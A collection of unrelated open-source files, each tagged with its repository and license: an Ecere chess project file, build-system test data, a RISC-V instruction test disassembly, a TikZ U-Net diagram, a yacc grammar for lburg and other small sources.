"Options" : {
"TargetType" : "Executable",
"TargetFileName" : "chess",
"Libraries" : [
"ecere"
]
},
"Configurations" : [
{
"Name" : "Debug",
"Options" : {
"Debug" : true,
"Console" : true
}
},
{
"Name" : "Release",
"Options" : {
"Optimization" : "Speed"
}
},
{
"Name" : "MemoryGuard",
"Options" : {
"Debug" : true,
"MemoryGuard" : true,
"Console" : true
}
},
{
"Name" : "Android",
"Options" : {
"Optimization" : "Speed",
"PreprocessorDefinitions" : [
"HIGH_DPI"
],
"TargetType" : "SharedLibrary",
"TargetFileName" : "Chess",
"FastMath" : true,
"PostbuildCommands" : [
"$(call mkdirq,$(OBJ)apk/lib/x86)",
"$(call mkdirq,$(OBJ)apk/lib/armeabi)",
"$(call cpq,/sdk/ecere/obj/android.linux.$(COMPILER)/libecere.so,$(OBJ)apk/lib/armeabi)",
"$(call cpq,$(TARGET),$(OBJ)apk/lib/armeabi)",
"aapt package -v -f -m -M android/AndroidManifest.xml -F $(OBJ)$(MODULE)-unsigned.apk -I C:/android-sdk/platforms/android-16/android.jar -S android/res $(OBJ)apk",
"jarsigner -storepass mypassword -sigalg MD5withRSA -digestalg SHA1 $(OBJ)$(MODULE)-unsigned.apk mykey -signedjar $(OBJ)$(MODULE).apk",
"adb uninstall com.ecere.$(MODULE)",
"adb install $(OBJ)$(MODULE).apk",
"adb shell am start -a android.intent.action.MAIN -n com.ecere.$(MODULE)/android.app.NativeActivity"
]
}
}
],
"Files" : [
{
"Folder" : "src",
"Files" : [
"about.ec",
"ai.ec",
"chess.ec",
"chess2D.ec",
"chess3D.ec",
"chessutils.ec",
"connect.ec",
"promotion.ec"
]
},
{
"Folder" : "android",
"Files" : [
{
"Folder" : "res",
"Files" : [
{
"Folder" : "drawable",
"Files" : [
{
"FileName" : "icon.png",
"Options" : {
"ExcludeFromBuild" : true
}
}
]
},
{
"Folder" : "drawable-xhdpi",
"Files" : [
"icon.png"
]
},
{
"Folder" : "values",
"Files" : [
"strings.xml"
]
}
]
},
"AndroidManifest.xml"
]
}
],
"ResourcesPath" : "res",
"Resources" : [
"aboutPic.jpg",
"blackBishop.png",
"blackKing.png",
"blackKnight.png",
"blackPawn.png",
"blackQueen.png",
"blackRook.png",
"board.jpg",
"bthr.jpg",
"darkwood.jpg",
"lightwo1.jpg",
"whiteBishop.png",
"whiteKing.png",
"whiteKnight.png",
"whitePawn.png",
"whiteQueen.png",
"whiteRook.png",
"chessSet.3ds"
]
}
| Ecere Projects | 3 | Acidburn0zzz/ecere-sdk | samples/games/chess/chess.epj | [
"BSD-3-Clause"
] |
# @ECLASS: deprecated.eclass
# @MAINTAINER:
# Random Dev <random.dev@gentoo.org>
# @AUTHOR:
# Random Dev <random.dev@gentoo.org>
# @BLURB: Example deprecated eclass with no replacement.
# @DEPRECATED: none
# @FUNCTION: deprecated_public_func
# @USAGE:
# @DESCRIPTION:
# Public stub function.
deprecated_public_func() { :; }
| Gentoo Eclass | 4 | floppym/pkgcheck | testdata/repos/eclass/eclass/deprecated.eclass | [
"BSD-3-Clause"
] |
4 4 16
0 0 1
0 1 2
0 2 3
0 3 4
1 0 5
1 1 6
1 2 7
1 3 8
2 0 9
2 1 10
2 2 11
2 3 12
3 0 13
3 1 14
3 2 15
3 3 16
| IDL | 1 | ricortiz/OpenTissue | demos/data/dlm/4/A.dlm | [
"Zlib"
] |
include "ctokens.grm"
#pragma -width 32726 -raw
define program
[repeat programelement]
end define
define programelement
[key] [NL]
| [comment] [NL]
| [token] [NL]
end define
function main
match [program]
P [program]
end function
| TXL | 3 | pseudoPixels/SourceFlow | txl_features/txl_features/c/tokenize.txl | [
"MIT"
] |
# Tests that Spack ignores targets that contain a partial match
cflags = -Wall
rule cc
command = gcc $cflags -c $in -o $out
build installcheck: cc foo.c
build checkinstall: cc foo.c
build foo-check-bar: cc foo.c
build foo_check_bar: cc foo.c
build foo/check/bar: cc foo.c
| Ninja | 3 | kkauder/spack | lib/spack/spack/test/data/ninja/negative/partial_match/build.ninja | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] |
/home/spinalvm/hdl/riscv-compliance/work//C.ANDI.elf: file format elf32-littleriscv
Disassembly of section .text.init:
80000000 <_start>:
80000000: 0001 nop
80000002: 0001 nop
80000004: 0001 nop
80000006: 0001 nop
80000008: 0001 nop
8000000a: 0001 nop
8000000c: 0001 nop
8000000e: 0001 nop
80000010: 0001 nop
80000012: 0001 nop
80000014: 0001 nop
80000016: 0001 nop
80000018: 0001 nop
8000001a: 0001 nop
8000001c: 0001 nop
8000001e: 0001 nop
80000020: 0001 nop
80000022: 0001 nop
80000024: 0001 nop
80000026: 0001 nop
80000028: 0001 nop
8000002a: 0001 nop
8000002c: 0001 nop
8000002e: 0001 nop
80000030: 0001 nop
80000032: 0001 nop
80000034: 0001 nop
80000036: 0001 nop
80000038: 0001 nop
8000003a: 0001 nop
8000003c: 0001 nop
8000003e: 0001 nop
80000040: 0001 nop
80000042: 0001 nop
80000044: 0001 nop
80000046: 0001 nop
80000048: 0001 nop
8000004a: 0001 nop
8000004c: 0001 nop
8000004e: 0001 nop
80000050: 0001 nop
80000052: 0001 nop
80000054: 0001 nop
80000056: 0001 nop
80000058: 0001 nop
8000005a: 0001 nop
8000005c: 0001 nop
8000005e: 0001 nop
80000060: 0001 nop
80000062: 0001 nop
80000064: 0001 nop
80000066: 0001 nop
80000068: 0001 nop
8000006a: 0001 nop
8000006c: 0001 nop
8000006e: 0001 nop
80000070: 0001 nop
80000072: 0001 nop
80000074: 0001 nop
80000076: 0001 nop
80000078: 0001 nop
8000007a: 0001 nop
8000007c: 0001 nop
8000007e: 0001 nop
80000080: 0001 nop
80000082: 0001 nop
80000084: 0001 nop
80000086: 0001 nop
80000088: 0001 nop
8000008a: 0001 nop
8000008c: 0001 nop
8000008e: 0001 nop
80000090: 0001 nop
80000092: 0001 nop
80000094: 0001 nop
80000096: 0001 nop
80000098: 0001 nop
8000009a: 0001 nop
8000009c: 0001 nop
8000009e: 0001 nop
800000a0: 0001 nop
800000a2: 0001 nop
800000a4: 0001 nop
800000a6: 0001 nop
800000a8: 0001 nop
800000aa: 0001 nop
800000ac: 0001 nop
800000ae: 0001 nop
800000b0: 0001 nop
800000b2: 0001 nop
800000b4: 0001 nop
800000b6: 0001 nop
800000b8: 0001 nop
800000ba: 0001 nop
800000bc: 0001 nop
800000be: 0001 nop
800000c0: 0001 nop
800000c2: 0001 nop
800000c4: 0001 nop
800000c6: 0001 nop
800000c8: 0001 nop
800000ca: 0001 nop
800000cc: 0001 nop
800000ce: 0001 nop
800000d0: 0001 nop
800000d2: 0001 nop
800000d4: 0001 nop
800000d6: 0001 nop
800000d8: 0001 nop
800000da: 0001 nop
800000dc: 0001 nop
800000de: 0001 nop
800000e0: 0001 nop
800000e2: 0001 nop
800000e4: 0001 nop
800000e6: 0001 nop
800000e8: 0001 nop
800000ea: 0001 nop
800000ec: 0001 nop
800000ee: 00001117 auipc sp,0x1
800000f2: f1210113 addi sp,sp,-238 # 80001000 <codasip_signature_start>
800000f6: 4581 li a1,0
800000f8: 8981 andi a1,a1,0
800000fa: c02e sw a1,0(sp)
800000fc: 4601 li a2,0
800000fe: 8a05 andi a2,a2,1
80000100: c232 sw a2,4(sp)
80000102: 4681 li a3,0
80000104: 8ac1 andi a3,a3,16
80000106: c436 sw a3,8(sp)
80000108: 4701 li a4,0
8000010a: 8b7d andi a4,a4,31
8000010c: c63a sw a4,12(sp)
8000010e: 4781 li a5,0
80000110: 9b85 andi a5,a5,-31
80000112: c83e sw a5,16(sp)
80000114: 00001117 auipc sp,0x1
80000118: f0010113 addi sp,sp,-256 # 80001014 <test_2_res>
8000011c: 4405 li s0,1
8000011e: 8801 andi s0,s0,0
80000120: c022 sw s0,0(sp)
80000122: 4485 li s1,1
80000124: 8885 andi s1,s1,1
80000126: c226 sw s1,4(sp)
80000128: 4585 li a1,1
8000012a: 89c1 andi a1,a1,16
8000012c: c42e sw a1,8(sp)
8000012e: 4605 li a2,1
80000130: 8a7d andi a2,a2,31
80000132: c632 sw a2,12(sp)
80000134: 4685 li a3,1
80000136: 9a85 andi a3,a3,-31
80000138: c836 sw a3,16(sp)
8000013a: 00001117 auipc sp,0x1
8000013e: eee10113 addi sp,sp,-274 # 80001028 <test_3_res>
80000142: fff00713 li a4,-1
80000146: 8b01 andi a4,a4,0
80000148: c03a sw a4,0(sp)
8000014a: fff00793 li a5,-1
8000014e: 8b85 andi a5,a5,1
80000150: c23e sw a5,4(sp)
80000152: fff00413 li s0,-1
80000156: 8841 andi s0,s0,16
80000158: c422 sw s0,8(sp)
8000015a: fff00493 li s1,-1
8000015e: 88fd andi s1,s1,31
80000160: c626 sw s1,12(sp)
80000162: fff00593 li a1,-1
80000166: 9985 andi a1,a1,-31
80000168: c82e sw a1,16(sp)
8000016a: 00001117 auipc sp,0x1
8000016e: ed210113 addi sp,sp,-302 # 8000103c <test_4_res>
80000172: 00080637 lui a2,0x80
80000176: fff60613 addi a2,a2,-1 # 7ffff <_start-0x7ff80001>
8000017a: 8a01 andi a2,a2,0
8000017c: c032 sw a2,0(sp)
8000017e: 000806b7 lui a3,0x80
80000182: fff68693 addi a3,a3,-1 # 7ffff <_start-0x7ff80001>
80000186: 8a85 andi a3,a3,1
80000188: c236 sw a3,4(sp)
8000018a: 00080737 lui a4,0x80
8000018e: fff70713 addi a4,a4,-1 # 7ffff <_start-0x7ff80001>
80000192: 8b41 andi a4,a4,16
80000194: c43a sw a4,8(sp)
80000196: 000807b7 lui a5,0x80
8000019a: fff78793 addi a5,a5,-1 # 7ffff <_start-0x7ff80001>
8000019e: 8bfd andi a5,a5,31
800001a0: c63e sw a5,12(sp)
800001a2: 00080437 lui s0,0x80
800001a6: fff40413 addi s0,s0,-1 # 7ffff <_start-0x7ff80001>
800001aa: 9805 andi s0,s0,-31
800001ac: c822 sw s0,16(sp)
800001ae: 00001117 auipc sp,0x1
800001b2: ea210113 addi sp,sp,-350 # 80001050 <test_5_res>
800001b6: 000804b7 lui s1,0x80
800001ba: 8881 andi s1,s1,0
800001bc: c026 sw s1,0(sp)
800001be: 000805b7 lui a1,0x80
800001c2: 8985 andi a1,a1,1
800001c4: c22e sw a1,4(sp)
800001c6: 00080637 lui a2,0x80
800001ca: 8a41 andi a2,a2,16
800001cc: c432 sw a2,8(sp)
800001ce: 000806b7 lui a3,0x80
800001d2: 8afd andi a3,a3,31
800001d4: c636 sw a3,12(sp)
800001d6: 00080737 lui a4,0x80
800001da: 9b05 andi a4,a4,-31
800001dc: c83a sw a4,16(sp)
800001de: 00001517 auipc a0,0x1
800001e2: e2250513 addi a0,a0,-478 # 80001000 <codasip_signature_start>
800001e6: 00001597 auipc a1,0x1
800001ea: e8a58593 addi a1,a1,-374 # 80001070 <_end>
800001ee: f0100637 lui a2,0xf0100
800001f2: f2c60613 addi a2,a2,-212 # f00fff2c <_end+0x700feebc>
800001f6 <complience_halt_loop>:
800001f6: 00b50c63 beq a0,a1,8000020e <complience_halt_break>
800001fa: 4554 lw a3,12(a0)
800001fc: c214 sw a3,0(a2)
800001fe: 4514 lw a3,8(a0)
80000200: c214 sw a3,0(a2)
80000202: 4154 lw a3,4(a0)
80000204: c214 sw a3,0(a2)
80000206: 4114 lw a3,0(a0)
80000208: c214 sw a3,0(a2)
8000020a: 0541 addi a0,a0,16
8000020c: b7ed j 800001f6 <complience_halt_loop>
8000020e <complience_halt_break>:
8000020e: f0100537 lui a0,0xf0100
80000212: f2050513 addi a0,a0,-224 # f00fff20 <_end+0x700feeb0>
80000216: 00052023 sw zero,0(a0)
...
Disassembly of section .data:
80001000 <codasip_signature_start>:
80001000: ffff 0xffff
80001002: ffff 0xffff
80001004: ffff 0xffff
80001006: ffff 0xffff
80001008: ffff 0xffff
8000100a: ffff 0xffff
8000100c: ffff 0xffff
8000100e: ffff 0xffff
80001010: ffff 0xffff
80001012: ffff 0xffff
80001014 <test_2_res>:
80001014: ffff 0xffff
80001016: ffff 0xffff
80001018: ffff 0xffff
8000101a: ffff 0xffff
8000101c: ffff 0xffff
8000101e: ffff 0xffff
80001020: ffff 0xffff
80001022: ffff 0xffff
80001024: ffff 0xffff
80001026: ffff 0xffff
80001028 <test_3_res>:
80001028: ffff 0xffff
8000102a: ffff 0xffff
8000102c: ffff 0xffff
8000102e: ffff 0xffff
80001030: ffff 0xffff
80001032: ffff 0xffff
80001034: ffff 0xffff
80001036: ffff 0xffff
80001038: ffff 0xffff
8000103a: ffff 0xffff
8000103c <test_4_res>:
8000103c: ffff 0xffff
8000103e: ffff 0xffff
80001040: ffff 0xffff
80001042: ffff 0xffff
80001044: ffff 0xffff
80001046: ffff 0xffff
80001048: ffff 0xffff
8000104a: ffff 0xffff
8000104c: ffff 0xffff
8000104e: ffff 0xffff
80001050 <test_5_res>:
80001050: ffff 0xffff
80001052: ffff 0xffff
80001054: ffff 0xffff
80001056: ffff 0xffff
80001058: ffff 0xffff
8000105a: ffff 0xffff
8000105c: ffff 0xffff
8000105e: ffff 0xffff
80001060: ffff 0xffff
80001062: ffff 0xffff
...
| ObjDump | 2 | cbrune/VexRiscv | src/test/resources/asm/C.ANDI.elf.objdump | [
"MIT"
] |
redo-ifchange md2man.py ../redo/py
if ../redo/py ./md2man.py /dev/null /dev/null >/dev/null; then
echo '../redo/py ./md2man.py $2.md.tmp $2.html'
else
echo "Warning: md2man.py missing modules; can't generate manpages." >&2
echo "Warning: try this: sudo easy_install markdown BeautifulSoup" >&2
echo 'echo Skipping: $2.1 >&2'
fi
| Stata | 3 | BlameJohnny/redo | docs/md-to-man.do | [
"Apache-2.0"
] |
A ← 3 2 ⍴ ⍳ 5 ⍝ Example input A
B ← ⍉ A ⍝ Example input B
WA ← (1↓⍴B),⍴A
KA ← (⊃⍴⍴A)-1
VA ← ⍳ ⊃ ⍴WA
ZA ← (KA⌽¯1↓VA),¯1↑VA
TA ← ZA⍉WA⍴A
WB ← (¯1↓⍴A),⍴B
KB ← ⊃ ⍴⍴A
VB ← ⍳ ⊃ ⍴WB
ZB0 ← (-KB) ↓ KB ⌽ ⍳(⊃⍴VB)
ZB ← (¯1↓(⍳ KB)),ZB0,KB
TB ← ZB⍉WB⍴B
R ← +/ 3 3 2 ⍴ TA×TB
R2 ← ×/ +/ R
⍝ 1 3 5
⍝ 2 4 1
⍝
⍝ 1 2 5 11 7 -+-> 23
⍝ 3 4 11 25 19 -+-> 55
⍝ 5 1 7 19 26 -+-> 52
⍝ 65780
| APL | 3 | mbudde/apltail | tests/inner2.apl | [
"MIT"
] |
\documentclass[border=8pt, multi, tikz]{standalone}
%\usepackage{blocks}
\usepackage{import}
\subimport{../../layers/}{init}
\usetikzlibrary{positioning}
\def\ConvColor{rgb:yellow,5;red,2.5;white,5}
\def\ConvReluColor{rgb:yellow,5;red,5;white,5}
\def\PoolColor{rgb:red,1;black,0.3}
\def\UnpoolColor{rgb:blue,2;green,1;black,0.3}
\def\ConcatColor{rgb:blue,5;red,2.5;white,5}
\def\FcReluColor{rgb:blue,5;red,5;white,4}
\def\SoftmaxColor{rgb:magenta,5;black,7}
\newcommand{\copymidarrow}{\tikz \draw[-Stealth,line width =0.8mm,draw={rgb:blue,4;red,1;green,1;black,3}] (-0.3,0) -- ++(0.3,0);}
\begin{document}
\begin{tikzpicture}
\tikzstyle{connection}=[ultra thick,every node/.style={sloped,allow upside down},draw=\edgecolor,opacity=0.7]
\tikzstyle{copyconnection}=[ultra thick,every node/.style={sloped,allow upside down},draw={rgb:blue,4;red,1;green,1;black,3},opacity=0.7]
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% Draw Encoder
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% conv1_1,conv1_2
\pic[shift={(0,0,0)}] at (0,0,0) {RightBandedBox={name=cr1,%
xlabel={{"64","64"}},caption=I,fill=\ConvColor,bandfill=\ConvReluColor,%
height=40,width={2,2},depth=40}};
%pool1
\pic[shift={(1.2,-10,0)}] at (cr1-east) {Box={name=p1,%
fill=\PoolColor,opacity=0.6,height=32,width=1,depth=32}};
%%%%%%%%%%
% conv2_1,conv2_2
\pic[shift={(0,0,0)}] at (p1-east) {RightBandedBox={name=cr2,%
xlabel={{"128","128"}},caption=I/2,fill=\ConvColor,bandfill=\ConvReluColor,%
height=32,width={3.5,3.5},depth=32}};
%pool2
\pic[shift={(1.2,-8.5,0)}] at (cr2-east) {Box={name=p2,%
fill=\PoolColor,opacity=0.6,height=25,width=1,depth=25}};
%%%%%%%%%%
% conv3_1,conv3_2
\pic[shift={(0,0,0)}] at (p2-east) {RightBandedBox={name=cr3,%
xlabel={{"256","256"}},caption=I/4,fill=\ConvColor,bandfill=\ConvReluColor,%
height=25,width={4.5,4.5},depth=25}};
%pool3
\pic[shift={(1.2,-6.5,0)}] at (cr3-east) {Box={name=p3,%
fill=\PoolColor,opacity=0.6,height=16,width=1,depth=16}};
%%%%%%%%%%
% conv4_1,conv4_2,conv4_3
\pic[shift={(0,0,0)}] at (p3-east) {RightBandedBox={name=cr4,%
xlabel={{"512","512"}},caption=I/8,fill=\ConvColor,bandfill=\ConvReluColor,%
height=16,width={6,6},depth=16}};
%pool4
\pic[shift={(1.2,-3,0)}] at (cr4-east) {Box={name=p4,%
fill=\PoolColor,opacity=0.6,height=8,width=1,depth=8}};
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% Bottleneck
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% conv5_1,conv5_2,conv5_3
\pic[shift={(0,0,0)}] at (p4-east) {RightBandedBox={name=cr5,caption=I/16,%
xlabel={{"1024","1024"}},fill=\ConvColor,bandfill=\ConvReluColor,%
height=8,width={8,8},depth=8}};
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% Draw Decoder
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% unpool4,
\pic[shift={(0,0,0)}] at (cr5-east) {Box={name=up4,%
fill=\UnpoolColor,opacity=0.6,height=16,width=1,depth=16}};
\pic[shift={(0,0,0)}] at (up4-east) {RightBandedBox={name=ucr4,%
xlabel={{"512","dummy"}},caption=I/8,fill=\ConvColor,bandfill=\ConvReluColor,%
height=16,width=6,depth=16}};
\pic[shift={(0,3,0)}] at (ucr4-anchor) {Ball={name=cat4,fill=\ConcatColor,radius=2.5,logo=$||$}};
\pic[shift={(1.4,0,0)}] at (cat4-east) {RightBandedBox={name=ucr4a,%
xlabel={{"512","512"}},caption=I/8,fill=\ConvColor,bandfill=\ConvReluColor,%
height=16,width={6,6},depth=16}};
%%%%%%%%%%
%% unpool3,
\pic[shift={(0,0,0)}] at (ucr4a-east) {Box={name=up3,%
fill=\UnpoolColor,opacity=0.6,height=25,width=1,depth=25}};
\pic[shift={(0,0,0)}] at (up3-east) {RightBandedBox={name=ucr3,%
xlabel={{"256","dummy"}},caption=I/4,fill=\ConvColor,bandfill=\ConvReluColor,%
height=25,width=4.5,depth=25}};
\pic[shift={(0,6.5,0)}] at (ucr3-anchor) {Ball={name=cat3,fill=\ConcatColor,radius=2.5,logo=$||$}};
\pic[shift={(1.5,0,0)}] at (cat3-east) {RightBandedBox={name=ucr3a,%
xlabel={{"256","256"}},caption=I/4,fill=\ConvColor,bandfill=\ConvReluColor,%
height=25,width={4.5,4.5},depth=25}};
%%%%%%%%%%
%% unpool2,
\pic[shift={(0,0,0)}] at (ucr3a-east) {Box={name=up2,%
fill=\UnpoolColor,opacity=0.6,height=32,width=1,depth=32}};
\pic[shift={(0,0,0)}] at (up2-east) {RightBandedBox={name=ucr2,%
xlabel={{"128","dummy"}},caption=I/2,fill=\ConvColor,bandfill=\ConvReluColor,%
height=32,width=3.5,depth=32}};
\pic[shift={(0,8.5,0)}] at (ucr2-anchor) {Ball={name=cat2,fill=\ConcatColor,radius=2.5,logo=$||$}};
\pic[shift={(1.8,0,0)}] at (cat2-east) {RightBandedBox={name=ucr2a,%
xlabel={{"128","128"}},caption=I/2,fill=\ConvColor,bandfill=\ConvReluColor,%
height=32,width={3.5,3.5},depth=32}};
%%%%%%%%%%
%% unpool1,
\pic[shift={(0,0,0)}] at (ucr2a-east) {Box={name=up1,%
fill=\UnpoolColor,opacity=0.6,height=40,width=1,depth=40}};
\pic[shift={(0,0,0)}] at (up1-east) {RightBandedBox={name=ucr1,%
xlabel={{"64","dummy"}},caption=I,fill=\ConvColor,bandfill=\ConvReluColor,%
height=40,width=2.5,depth=40}};
\pic[shift={(0,10,0)}] at (ucr1-anchor) {Ball={name=cat1,fill=\ConcatColor,radius=2.5,logo=$||$}};
\pic[shift={(2,0,0)}] at (cat1-east) {RightBandedBox={name=ucr1a,%
xlabel={{"64","64"}},caption=I,fill=\ConvColor,bandfill=\ConvReluColor,%
height=40,width={2.5,2.5},depth=40}};
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% Classifier
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
\pic[shift={(2,0,0)}] at (ucr1a-east) {Box={name=out,caption=Softmax,%
zlabel=I,fill=\SoftmaxColor,height=40,width=1,depth=40}};
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% Draw connections
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
\path (cr1-east) -- (p1-west|-cr1-west) coordinate[pos=0.5] (crp1-mid) ;
\path (cr2-east) -- (p2-west|-cr2-west) coordinate[pos=0.5] (crp2-mid) ;
\path (cr3-east) -- (p3-west|-cr3-west) coordinate[pos=0.5] (crp3-mid) ;
\path (cr4-east) -- (p4-west|-cr4-west) coordinate[pos=0.5] (crp4-mid) ;
\draw[connection](cr1-east)--node{\midarrow}(crp1-mid)--node{\midarrow}(p1-west-|crp1-mid)--node{\midarrow}(p1-west);
\draw[connection](cr2-east)--node{\midarrow}(crp2-mid)--node{\midarrow}(p2-west-|crp2-mid)--node{\midarrow}(p2-west);
\draw[connection](cr3-east)--node{\midarrow}(crp3-mid)--node{\midarrow}(p3-west-|crp3-mid)--node{\midarrow}(p3-west);
\draw[connection](cr4-east)--node{\midarrow}(crp4-mid)--node{\midarrow}(p4-west-|crp4-mid)--node{\midarrow}(p4-west);
%\draw [connection] (cr5-east) -- node {\midarrow} (up4-west);
%\draw [connection] (ucr4a-east) -- node {\midarrow} (up3-west);
%\draw [connection] (ucr3a-east) -- node {\midarrow} (up2-west);
%\draw [connection] (ucr2a-east) -- node {\midarrow} (up1-west);
\draw [connection] (ucr1a-east) -- node {\midarrow} (out-west);
%\draw [connection] (out-east) -- node {\midarrow} ++(2,0,0);
\draw [copyconnection] (cr4-east) -- node {\copymidarrow} (cat4-west);
\draw [copyconnection] (cr3-east) -- node {\copymidarrow} (cat3-west);
\draw [copyconnection] (cr2-east) -- node {\copymidarrow} (cat2-west);
\draw [copyconnection] (cr1-east) -- node {\copymidarrow} (cat1-west);
\draw [copyconnection] (cat4-east) -- node {\copymidarrow} (ucr4a-west);
\draw [copyconnection] (cat3-east) -- node {\copymidarrow} (ucr3a-west);
\draw [copyconnection] (cat2-east) -- node {\copymidarrow} (ucr2a-west);
\draw [copyconnection] (cat1-east) -- node {\copymidarrow} (ucr1a-west);
\draw [copyconnection] (ucr4-north) -- node {\copymidarrow} (cat4-south);
\draw [copyconnection] (ucr3-north) -- node {\copymidarrow} (cat3-south);
\draw [copyconnection] (ucr2-north) -- node {\copymidarrow} (cat2-south);
\draw [copyconnection] (ucr1-north) -- node {\copymidarrow} (cat1-south);
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
\end{tikzpicture}
\end{document}
| TeX | 4 | yz-hust/PlotNeuralNet | examples/Unet_Ushape/Unet_ushape.tex | [
"MIT"
] |
%{
#include <stdio.h>
#include "lburg.h"
static char rcsid[] = "$Id: gram.y 145 2001-10-17 21:53:10Z timo $";
/*lint -e616 -e527 -e652 -esym(552,yynerrs) -esym(563,yynewstate,yyerrlab) */
static int yylineno = 0;
%}
%union {
int n;
char *string;
Tree tree;
}
%term TERMINAL
%term START
%term PPERCENT
%token <string> ID TEMPLATE CODE
%token <n> INT
%type <string> nonterm cost
%type <tree> tree
%%
spec : decls PPERCENT rules { yylineno = 0; }
| decls { yylineno = 0; }
;
decls : /* lambda */
| decls decl
;
decl : TERMINAL blist '\n'
| START nonterm '\n' {
if (nonterm($2)->number != 1)
yyerror("redeclaration of the start symbol\n");
}
| '\n'
| error '\n' { yyerrok; }
;
blist : /* lambda */
| blist ID '=' INT { term($2, $4); }
;
rules : /* lambda */
| rules nonterm ':' tree TEMPLATE cost '\n' { rule($2, $4, $5, $6); }
| rules '\n'
| rules error '\n' { yyerrok; }
;
nonterm : ID { nonterm($$ = $1); }
;
tree : ID { $$ = tree($1, 0, 0); }
| ID '(' tree ')' { $$ = tree($1, $3, 0); }
| ID '(' tree ',' tree ')' { $$ = tree($1, $3, $5); }
;
cost : CODE { if (*$1 == 0) $$ = "0"; }
;
%%
#include <assert.h>
#include <stdarg.h>
#include <ctype.h>
#include <string.h>
#include <limits.h>
int errcnt = 0;
FILE *infp = NULL;
FILE *outfp = NULL;
static char buf[BUFSIZ], *bp = buf;
static int ppercent = 0;
static int code = 0;
static int get(void) {
if (*bp == 0) {
bp = buf;
*bp = 0;
if (fgets(buf, sizeof buf, infp) == NULL)
return EOF;
yylineno++;
while (buf[0] == '%' && buf[1] == '{' && buf[2] == '\n') {
for (;;) {
if (fgets(buf, sizeof buf, infp) == NULL) {
yywarn("unterminated %{...%}\n");
return EOF;
}
yylineno++;
if (strcmp(buf, "%}\n") == 0)
break;
fputs(buf, outfp);
}
if (fgets(buf, sizeof buf, infp) == NULL)
return EOF;
yylineno++;
}
}
return *bp++;
}
void yyerror(char *fmt, ...) {
va_list ap;
va_start(ap, fmt);
if (yylineno > 0)
fprintf(stderr, "line %d: ", yylineno);
vfprintf(stderr, fmt, ap);
if (fmt[strlen(fmt)-1] != '\n')
fprintf(stderr, "\n");
errcnt++;
va_end(ap);
}
int yylex(void) {
int c;
if (code) {
char *p;
bp += strspn(bp, " \t\f");
p = strchr(bp, '\n');
if (p == NULL)
p = strchr(bp, '\n');
while (p > bp && isspace(p[-1]))
p--;
yylval.string = alloc(p - bp + 1);
strncpy(yylval.string, bp, p - bp);
yylval.string[p - bp] = 0;
bp = p;
code--;
return CODE;
}
while ((c = get()) != EOF) {
switch (c) {
case ' ': case '\f': case '\t':
continue;
case '\n':
case '(': case ')': case ',':
case ':': case '=':
return c;
}
if (c == '%' && *bp == '%') {
bp++;
return ppercent++ ? 0 : PPERCENT;
} else if (c == '%' && strncmp(bp, "term", 4) == 0
&& isspace(bp[4])) {
bp += 4;
return TERMINAL;
} else if (c == '%' && strncmp(bp, "start", 5) == 0
&& isspace(bp[5])) {
bp += 5;
return START;
} else if (c == '"') {
char *p = strchr(bp, '"');
if (p == NULL) {
yyerror("missing \" in assembler template\n");
p = strchr(bp, '\n');
if (p == NULL)
p = strchr(bp, '\0');
}
assert(p);
yylval.string = alloc(p - bp + 1);
strncpy(yylval.string, bp, p - bp);
yylval.string[p - bp] = 0;
bp = *p == '"' ? p + 1 : p;
code++;
return TEMPLATE;
} else if (isdigit(c)) {
int n = 0;
do {
int d = c - '0';
if (n > (INT_MAX - d)/10)
yyerror("integer greater than %d\n", INT_MAX);
else
n = 10*n + d;
c = get();
} while (c != EOF && isdigit(c));
bp--;
yylval.n = n;
return INT;
} else if (isalpha(c)) {
char *p = bp - 1;
while (isalpha(*bp) || isdigit(*bp) || *bp == '_')
bp++;
yylval.string = alloc(bp - p + 1);
strncpy(yylval.string, p, bp - p);
yylval.string[bp - p] = 0;
return ID;
} else if (isprint(c))
yyerror("invalid character `%c'\n", c);
else
yyerror("invalid character `\\%03o'\n", (unsigned char)c);
}
return 0;
}
void yywarn(char *fmt, ...) {
va_list ap;
va_start(ap, fmt);
if (yylineno > 0)
fprintf(stderr, "line %d: ", yylineno);
fprintf(stderr, "warning: ");
vfprintf(stderr, fmt, ap);
va_end(ap);
}
| Yacc | 4 | arbaazkhan2/act_unreal | engine/code/tools/lcc/lburg/gram.y | [
"CC-BY-4.0"
] |
/*
[The "BSD licence"]
Copyright (c) 2013 Sam Harwell
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions
are met:
1. Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
3. The name of the author may not be used to endorse or promote products
